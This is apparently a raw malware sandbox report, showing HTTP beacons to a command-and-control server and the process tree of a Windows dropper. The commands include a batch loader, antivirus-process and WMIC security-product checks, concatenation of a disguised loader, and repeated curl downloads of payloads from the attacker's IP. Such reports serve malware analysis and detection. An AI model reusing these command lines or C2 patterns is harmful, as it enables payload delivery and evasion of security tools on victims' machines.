                                        Accept: */*
                                        Nov 21, 2024 20:02:38.912961960 CET | 207 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:38 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        89 | 192.168.2.4 | 50091 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:37.584041119 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:38.908029079 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:38 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        90 | 192.168.2.4 | 50092 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:39.983726025 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:41.290039062 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:41 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        91 | 192.168.2.4 | 50093 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:40.169918060 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:41.536570072 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:41 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        92 | 192.168.2.4 | 50094 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:41.497349024 CET | 176 | OUT | GET /v10/ukyh.php?jspo=3002&melq=e3ad1d0b2449c169e66efe472513a377*6&jwvs=9A5605DE11447A0E2031624EE8FBDE HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:42.797537088 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:42 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 74 72 75 65
                                        Data Ascii: true


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        93 | 192.168.2.4 | 50095 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:41.781832933 CET | 175 | OUT | GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:43.138716936 CET | 207 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:42 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        94 | 192.168.2.4 | 50096 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:44.272073030 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:45.550164938 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:45 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        95 | 192.168.2.4 | 50097 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:44.660490990 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:46.032340050 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:45 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        96 | 192.168.2.4 | 50098 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:45.747179031 CET | 143 | OUT | GET /v10/ukyh.php?jspo=2016&jwvs=9A5605DE11447A0E2031624EE8FBDE&bsxa=1 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:48.183474064 CET | 204 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:46 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 5
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 66 61 6c 73 65
                                        Data Ascii: false


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        97192.168.2.450099178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:46.233840942 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:47.543230057 CET | 207 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:47 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==



                                        Target ID:0
                                        Start time:13:58:38
                                        Start date:21/11/2024
                                        Path:C:\Users\user\Desktop\vqMMwqCFZQ.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\vqMMwqCFZQ.exe"
                                        Imagebase:0x400000
                                        File size:1'069'345 bytes
                                        MD5 hash:8E55A7932D1B9649ABA9D3E97CA688CE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:1
                                        Start time:13:58:39
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.bat
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:2
                                        Start time:13:58:39
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:13:58:41
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist
                                        Imagebase:0xc70000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:13:58:41
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\findstr.exe
                                        Wow64 process (32bit):true
                                        Commandline:findstr /I "wrsa opssvc"
                                        Imagebase:0x4f0000
                                        File size:29'696 bytes
                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:13:58:41
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist
                                        Imagebase:0x7ff7699e0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:13:58:41
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\findstr.exe
                                        Wow64 process (32bit):true
                                        Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                        Imagebase:0x4f0000
                                        File size:29'696 bytes
                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:13:58:42
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:cmd /c md 139918
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:13:58:42
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\findstr.exe
                                        Wow64 process (32bit):true
                                        Commandline:findstr /V "SyntaxMilesImperialTriple" Credits
                                        Imagebase:0x4f0000
                                        File size:29'696 bytes
                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:9
                                        Start time:13:58:42
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:cmd /c copy /b ..\Asked + ..\Leaving + ..\During + ..\Chairman + ..\Bracket + ..\Label + ..\Perhaps v
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:10
                                        Start time:13:58:42
                                        Start date:21/11/2024
                                        Path:C:\Users\user\AppData\Local\Temp\139918\Ur.pif
                                        Wow64 process (32bit):true
                                        Commandline:Ur.pif v
                                        Imagebase:0x610000
                                        File size:893'608 bytes
                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 5%, ReversingLabs
                                        Has exited:false

                                        Target ID:11
                                        Start time:13:58:43
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\choice.exe
                                        Wow64 process (32bit):true
                                        Commandline:choice /d y /t 5
                                        Imagebase:0x420000
                                        File size:28'160 bytes
                                        MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:15
                                        Start time:13:59:35
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\807 2>&1
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:16
                                        Start time:13:59:35
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:17
                                        Start time:13:59:35
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                        Wow64 process (32bit):true
                                        Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
                                        Imagebase:0x290000
                                        File size:427'008 bytes
                                        MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:18
                                        Start time:13:59:37
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\807 > C:\Users\user\AppData\Local\temp\237
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:19
                                        Start time:13:59:37
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:20
                                        Start time:13:59:37
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:21
                                        Start time:13:59:37
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:22
                                        Start time:13:59:38
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:24
                                        Start time:14:00:05
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dxjyu" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:25
                                        Start time:14:00:05
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:26
                                        Start time:14:00:05
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\dxjyu" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:27
                                        Start time:14:00:07
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dhmio" "178.215.224.74/v10/ukyh.php?jspo=5"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:28
                                        Start time:14:00:07
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:29
                                        Start time:14:00:07
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\dhmio" "178.215.224.74/v10/ukyh.php?jspo=5"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:30
                                        Start time:14:00:09
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fprwf" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:31
                                        Start time:14:00:09
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:32
                                        Start time:14:00:09
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\fprwf" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:33
                                        Start time:14:00:10
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\nhrsa" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:34
                                        Start time:14:00:10
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:35
                                        Start time:14:00:10
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\nhrsa" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:36
                                        Start time:14:00:12
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\rrmou" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:37
                                        Start time:14:00:12
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:38
                                        Start time:14:00:12
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\rrmou" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:39
                                        Start time:14:00:15
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fofqx" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:40
                                        Start time:14:00:15
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:41
                                        Start time:14:00:15
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\fofqx" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:42
                                        Start time:14:00:16
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\zxfdn" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:43
                                        Start time:14:00:17
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:44
                                        Start time:14:00:17
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\zxfdn" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:45
                                        Start time:14:00:18
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gvhdi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:46
                                        Start time:14:00:18
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
